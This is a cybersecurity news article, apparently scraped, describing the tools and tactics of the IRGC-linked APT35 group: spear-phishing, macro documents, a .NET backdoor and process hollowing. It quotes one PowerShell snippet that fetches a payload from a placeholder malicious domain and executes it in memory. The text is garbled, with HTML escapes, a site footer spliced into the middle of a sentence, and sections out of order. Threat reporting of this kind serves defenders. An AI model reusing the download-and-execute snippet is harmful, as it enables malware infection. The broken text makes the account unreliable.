IRGC-Linked APT35 Structure, Tools, and Espionage Operations Disclosed
\n \t
\n
<\/BR>
\n
\n \t
\n
<\/BR><\/p>\n
Since emerging in the mid-2010s as a persistent threat actor, the IRGC-linked APT35 collective has continually adapted its tactics to target government entities, energy firms, and diplomatic missions across the Middle East and beyond.<\/p>\n
Initially focused on credential harvesting via targeted phishing campaigns<\/a>, the group has evolved a modular toolkit capable of deep network infiltration and long-term espionage.<\/p>\n Its operations begin with carefully crafted spear-phishing messages that exploit legacy Office macro vulnerabilities, setting the stage for stealthy deployment of backdoors.<\/p>\n Cloudsek analysts noted that APT35\u2019s toolset includes both custom and publicly available components, allowing researchers to trace distinct code fingerprints even as the adversary pivots between payloads.<\/p>\n After the second paragraph, Cloudsek researchers identified<\/a> a correlation between the group\u2019s use of .NET-based implants and a pronounced shift toward in-memory execution techniques, reducing disk artifacts and complicating forensic analysis.<\/p>\n This discovery has driven the development of tailored detection rules for network defenders<\/a>.<\/p>\n The campaign\u2019s impact has been significant: compromised networks have suffered data exfiltration of diplomatic communications, intellectual property theft, and strategic reconnaissance tailored to state-level objectives.<\/p>\n APT35\u2019s operational security measures\u2014including randomized C2 beaconing intervals and encrypted channels over HTTP\/HTTPS\u2014have consistently evaded traditional signature-based defenses. Victims often remain unaware of compromise for months, allowing deep data collection and lateral propagation.<\/p>\n The group\u2019s espionage operations extend beyond technical tradecraft. APT35 operators conduct extensive open-source intelligence (OSINT<\/a>) gathering to craft highly convincing lures, leveraging geopolitical events and professional contacts in targeted organizations.<\/p>\n This human-centric approach, combined with advanced malware, underscores the adversary\u2019s adaptability and resource investment.<\/p>\n APT35\u2019s primary infection vector leverages weaponized Word documents containing obfuscated VBA macros designed to load a staged downloader into memory.<\/p>\n Upon document opening, the macro executes a PowerShell<\/a> command that masquerades as a legitimate Windows Update process:-<\/p>\n This downloader decrypts the next-stage DLL using an AES key embedded in the VBA code. The decrypted payload, typically a .NET-compiled backdoor known as PhosphorusLoader<\/strong>, registers as a COM object for persistence.<\/p>\n It employs process hollowing to inject into Follow us on\u00a0Google News<\/a>,\u00a0LinkedIn<\/a>,\u00a0and\u00a0X<\/a>\u00a0to Get More Instant Updates<\/strong>,\u00a0Set CSN as a Preferred Source in\u00a0Google<\/a>.<\/strong><\/p>\n The post IRGC-Linked APT35 Structure, Tools, and Espionage Operations Disclosed<\/a> appeared first on Cyber Security News<\/a>.<\/p>\n<\/div>\nInfection Mechanism Deep Dive<\/strong><\/h2>\n
$u = \"http:\/\/malicious[.]domain\/payload.bin\"\n$r = Invoke-WebRequest -Uri $u -UseBasicParsing\n$e = [System.Text.Encoding]::UTF8.GetString($r.Content)\nInvoke-Expression $e<\/code><\/pre>\nsvchost.exe<\/code>, intermittently beaconing to a hidden C2 domain. Figure 1 illustrates this injection workflow, with the AES key stored in an encrypted resource section for evasion.<\/p>\n